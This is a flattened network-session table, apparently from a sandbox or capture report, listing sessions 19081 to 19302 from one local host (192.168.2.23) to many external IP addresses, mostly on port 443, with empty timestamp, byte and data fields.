                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19081192.168.2.234629241.114.25.178443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19082192.168.2.2333090210.176.90.186443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19083192.168.2.2346176108.169.157.118443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19084192.168.2.2355524204.14.129.198443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19085192.168.2.2344552199.205.57.238443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19086192.168.2.2346970203.126.23.128443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19087192.168.2.2339826196.15.125.3443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19088192.168.2.2334876111.247.183.165443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19089192.168.2.234201471.219.188.72443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19090192.168.2.235931652.238.79.164443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19091192.168.2.234421848.24.237.207443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19092192.168.2.2360532158.79.152.89443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19093192.168.2.235057496.62.147.127443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19094192.168.2.233522612.208.109.61443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19095192.168.2.2354450219.25.185.133443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19096192.168.2.2351796173.89.113.219443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19097192.168.2.2358998109.23.108.235443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19098192.168.2.234277273.235.33.65443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19099192.168.2.2343178219.142.185.58443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19100192.168.2.2358940138.182.21.7443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19101192.168.2.233610480.213.141.137443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19102192.168.2.2336736135.169.221.179443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19103192.168.2.2347220117.198.214.105443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19104192.168.2.2348302220.27.62.67443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19105192.168.2.2340576186.179.227.165443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19106192.168.2.2338640104.26.14.1408080
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19107192.168.2.234087082.206.89.298080
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19108192.168.2.2344024207.148.3.2058080
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19109192.168.2.2360064185.150.234.92443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19110192.168.2.2342938161.103.37.84443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19111192.168.2.2341068112.247.145.53443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19112192.168.2.2340798156.161.126.56443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19113192.168.2.235875232.107.89.196443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19114192.168.2.2348566222.239.214.134443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19115192.168.2.2335588144.24.129.136443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19116192.168.2.2337786197.198.110.37443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19117192.168.2.236058679.128.225.236443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19118192.168.2.233303048.58.59.202443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19119192.168.2.234035045.255.37.35443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19120192.168.2.2351226221.118.134.178443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19121192.168.2.233435034.19.5.232443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19122192.168.2.235619025.181.231.52443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19123192.168.2.234780842.196.252.226443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19124192.168.2.2341376135.210.178.38443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19125192.168.2.2338426148.18.46.205443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19126192.168.2.2339084135.48.49.40443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19127192.168.2.234285898.118.194.242443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19128192.168.2.235045240.37.98.190443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19129192.168.2.2337942111.149.205.202443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19130192.168.2.233835841.174.103.187443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19131192.168.2.233676671.229.185.140443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19132192.168.2.235225025.134.210.171443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19133192.168.2.2348068103.64.213.124443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19134192.168.2.2338804168.93.189.100443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19135192.168.2.233397470.190.158.232443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19136192.168.2.235527054.249.79.234443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19137192.168.2.2355726183.32.240.162443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19138192.168.2.2337472149.28.99.60443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19139192.168.2.2339750103.5.6.119443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19140192.168.2.23500469.40.71.204443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19141192.168.2.2338830133.135.195.166443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19142192.168.2.2359972145.105.125.102443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19143192.168.2.2334346173.118.30.201443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19144192.168.2.2347982138.208.69.98443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19145192.168.2.234712871.197.38.144443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19146192.168.2.2337046153.164.6.251443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19147192.168.2.234997044.21.111.39443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19148192.168.2.235976831.170.173.76443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19149192.168.2.235713879.201.76.141443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19150192.168.2.2349564169.32.234.253443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19151192.168.2.233560892.88.125.50443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19152192.168.2.2345746122.241.193.221443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19153192.168.2.2358088123.55.206.62443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19154192.168.2.2334612100.140.252.81443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19155192.168.2.23503722.156.157.2443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19156192.168.2.2345574118.2.76.41443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19157192.168.2.2355182218.165.208.177443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19158192.168.2.2342664118.111.98.250443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19159192.168.2.233661097.237.155.179443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19160192.168.2.234804675.247.14.168443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19161192.168.2.2345108222.18.47.156443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19162192.168.2.2359890187.108.219.211443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19163192.168.2.2350382116.170.177.31443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19164192.168.2.235287276.24.213.200443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19165192.168.2.2341052178.103.129.0443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19166192.168.2.2352792173.149.31.79443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19167192.168.2.233596290.175.40.18443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19168192.168.2.2345890199.150.99.198443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19169192.168.2.2360476187.87.168.5443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19170192.168.2.234413461.202.0.160443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19171192.168.2.2348360114.179.61.224443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19172192.168.2.234929251.31.119.240443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19173192.168.2.236060052.209.58.36443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19174192.168.2.2344532136.185.235.179443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19175192.168.2.235184085.121.22.133443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19176192.168.2.2351274114.85.39.141443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19177192.168.2.2339560205.206.211.155443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19178192.168.2.234008271.5.214.62443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19179192.168.2.2340490117.125.14.21443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19180192.168.2.234061661.225.3.143443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19181192.168.2.235936878.162.80.108443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19182192.168.2.234812077.111.231.146443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19183192.168.2.234058251.252.60.105443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19184192.168.2.2360536154.144.124.203443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19185192.168.2.2334396196.80.22.163443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19186192.168.2.2353166183.43.246.136443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19187192.168.2.23394625.208.17.181443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19188192.168.2.2351236191.44.217.60443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19189192.168.2.2359124106.53.78.237443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19190192.168.2.235151663.152.85.222443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19191192.168.2.2359402112.24.52.141443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19192192.168.2.2347230155.187.244.232443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19193192.168.2.2342254141.20.249.220443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19194192.168.2.2349388153.53.42.14443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19195192.168.2.2350150124.65.218.161443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19196192.168.2.2345936177.221.149.107443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19197192.168.2.234508282.235.99.11443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19198192.168.2.235350432.44.119.193443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19199192.168.2.2341500203.234.46.180443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19200192.168.2.235324219.154.144.112443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19201192.168.2.2342836138.149.76.236443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19202192.168.2.2334728222.46.163.103443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19203192.168.2.234041699.126.164.44443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19204192.168.2.2348126150.226.97.85443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19205192.168.2.234531897.233.211.8443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19206192.168.2.235909651.238.160.193443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19207192.168.2.2351780144.59.80.16443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19208192.168.2.2344610176.173.185.5443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19209192.168.2.2353908181.104.96.63443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19210192.168.2.235702645.198.189.133443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19211192.168.2.2347326114.164.86.168443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19212192.168.2.2334858208.178.140.12443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19213192.168.2.234472062.51.207.42443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19214192.168.2.2356676124.92.185.152443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19215192.168.2.2333268206.131.182.109443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19216192.168.2.2351784162.79.251.13443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19217192.168.2.236041868.45.94.172443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19218192.168.2.2347798132.157.167.162443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19219192.168.2.2350986161.43.226.75443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19220192.168.2.234579453.192.128.109443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19221192.168.2.2338908192.63.155.79443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19222192.168.2.234078691.144.53.182443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19223192.168.2.2346904151.146.100.181443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19224192.168.2.2340440185.58.215.135443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19225192.168.2.2350438113.66.138.41443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19226192.168.2.2356450161.123.173.119443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19227192.168.2.235538817.137.188.193443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19228192.168.2.2351024197.61.176.51443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19229192.168.2.23425041.127.34.50443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19230192.168.2.2351416108.92.7.214443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19231192.168.2.2357806155.126.50.211443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19232192.168.2.2355056139.133.186.57443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19233192.168.2.23390628.57.154.183443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19234192.168.2.2355282110.47.229.80443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19235192.168.2.2359980145.85.36.45443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19236192.168.2.2354052133.79.58.134443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19237192.168.2.2344128114.42.152.156443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19238192.168.2.233893837.248.137.128443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19239192.168.2.2333898165.15.14.112443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19240192.168.2.235327654.116.2.181443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19241192.168.2.23568844.4.28.109443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19242192.168.2.2336444192.74.16.158443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19243192.168.2.235613446.244.147.224443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19244192.168.2.2349468210.109.179.122443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19245192.168.2.233912234.50.189.182443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19246192.168.2.2352354115.175.63.179443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19247192.168.2.234715866.152.28.161443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19248192.168.2.2338996179.172.115.161443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19249192.168.2.233776819.141.30.203443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19250192.168.2.234259483.56.73.102443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19251192.168.2.2338732203.1.10.169443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19252192.168.2.2352602115.175.231.182443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19253192.168.2.235328866.227.68.25443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19254192.168.2.2356030187.131.214.129443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19255192.168.2.235077860.251.170.157443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19256192.168.2.2339782200.98.190.47443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19257192.168.2.2356264132.112.31.190443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19258192.168.2.2336808144.57.138.133443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19259192.168.2.235650853.193.179.253443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19260192.168.2.235583224.64.142.12443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19261192.168.2.235885457.5.5.252443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19262192.168.2.2343580208.45.167.12443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19263192.168.2.2334974188.83.112.178443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19264192.168.2.235758466.43.17.242443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19265192.168.2.2345214213.91.76.161443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19266192.168.2.2356214171.85.134.68443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19267192.168.2.2339220148.0.77.158443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19268192.168.2.2350430209.146.57.102443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19269192.168.2.2343246146.193.124.47443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19270192.168.2.235700227.146.213.104443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19271192.168.2.2359468197.71.119.244443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19272192.168.2.2337914126.50.22.155443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19273192.168.2.2343694154.53.229.149443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19274192.168.2.2352020176.241.224.193443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19275192.168.2.2334030154.205.84.180443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19276192.168.2.2345986109.84.125.228443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19277192.168.2.233516063.100.251.200443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19278192.168.2.2343830116.246.227.3443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19279192.168.2.2353304197.120.118.212443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19280192.168.2.233671467.97.187.82443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19281192.168.2.2348826120.186.57.168443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19282192.168.2.23370344.120.91.241443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19283192.168.2.233365281.57.76.190443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19284192.168.2.2334480130.176.209.102443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19285192.168.2.2346556113.39.28.127443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19286192.168.2.2358052130.183.15.205443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19287192.168.2.234868420.131.95.219443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19288192.168.2.2353364212.148.52.209443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19289192.168.2.234703623.117.190.210443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19290192.168.2.234889085.141.227.92443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19291192.168.2.233659443.19.0.98443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19292192.168.2.2356380145.231.220.219443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19293192.168.2.2355526140.165.96.15443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19294192.168.2.2358474138.152.180.115443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19295192.168.2.233802288.222.145.171443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19296192.168.2.235606283.14.5.166443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19297192.168.2.234575425.167.42.71443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19298192.168.2.233667078.153.99.230443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19299192.168.2.2347180170.222.171.167443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19300192.168.2.2343976128.67.216.143443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19301192.168.2.234084259.9.222.33443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19302192.168.2.2339300102.1.230.240443
